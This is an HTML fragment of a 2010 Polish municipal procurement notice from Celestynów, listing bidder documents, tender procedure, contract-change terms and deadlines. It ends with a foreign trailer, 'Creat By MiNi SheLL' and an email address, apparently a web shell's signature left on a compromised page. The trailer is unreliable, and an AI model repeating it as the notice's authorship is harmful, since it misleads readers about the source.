</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu lub oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia o spełnianiu warunków udziału w postępowaniu, zgodnie z wzorem przedstawionym odpowiednio w Załączniku Nr 3a i Załączniku Nr 3b do SIWZ.
Wykonawcy ubiegający się wspólnie o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienie publicznego, w rozumieniu art. 23 Pzp - Zamawiający wymaga dołączenia do oferty pełnomocnictwa do reprezentowania Wykonawców ubiegających się wspólnie o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienie publicznego. Pełnomocnictwo niniejsze winno być przedstawione w oryginale, notarialnie poświadczonej kopii lub kopii poświadczonej za zgodność z oryginałem przez mocodawcę. 
Wykonawcy wspólnie ubiegający się o zamówienie mogą spełnić łącznie warunki wymagane od Wykonawców, o których mowa w Rozdziale 4 SIWZ (w tym warunek dotyczący wysokości kwoty ubezpieczenia od odpowiedzialności cywilnej, posiadanych środków finansowych), z zastrzeżeniem ust. 5.4 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana nazwy zadania, numery kont bankowych, siedziba którejkolwiek ze stron umowy;
- zmiana przedstawicieli stron, inspektorzy nadzoru inwestorskiego i inne osoby; 
- skrócenie termin wykonania robót budowlanych, powodujący skrócenie okresu realizacji umowy,
- wydłużenie terminu wykonania robót budowlanych, spowodowany w szczególności brakami lub wadami w dokumentacji projektowej lub w innych dokumentach budowy, opóźnieniami w zakresie dokonywania odbiorów lub prób częściowych i końcowego, szczególnie niesprzyjającymi warunkami atmosferycznymi, zawieszeniem przez Zamawiającego wykonania robót, epidemią, żywiołami, siłą wyższą, jakimikolwiek opóźnieniami, zmianami jakości, parametrów lub technologii, zmianami producenta urządzeń, materiałów lub wyposażenia, wystąpieniem robót dodatkowych, odkryciem wykopalisk uniemożliwiających wykonywanie robót, wstrzymaniem robót na mocy decyzji organów uprawnionych do wstrzymania lub przerwania robót z przyczyn niezależnych od Zamawiającego i Wykonawcy, wystąpienia w trakcie wykonania robót kolizji z sieciami lub innymi przeszkodami, które nie były możliwe do przewidzenia, powodujący wydłużenie okresu realizacji robót budowlanych;
- zmiana w wyniku postępu techniczno - technologicznego lub wycofania z produkcji zastosowane materiały, wyposażenie, urządzenia lub technologia gwarantujące uzyskanie parametrów nie gorszych od zaprojektowanych, a ich zastosowanie nie spowoduje wzrostu ogólnej wartości przedmiotu umowy.
-  zakresie przedłużenia terminu realizacji przedmiotu zamówienia w związku ze zleceniem zamówień dodatkowych, o których mowa  w art. 67 ust. 1 pkt 5 Ustawy o czas niezbędny na ich wykonanie;
-	Wszelkie zmiany Umowy wymagają zachowania formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.celestynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Celestynów
ul. Regucka 3
05-430 Celestynów 
pok. nr 35-34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2010 godzina 10:00, miejsce: Urząd Gminy Celestynów
ul. Regucka 3
05-430 Celestynów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com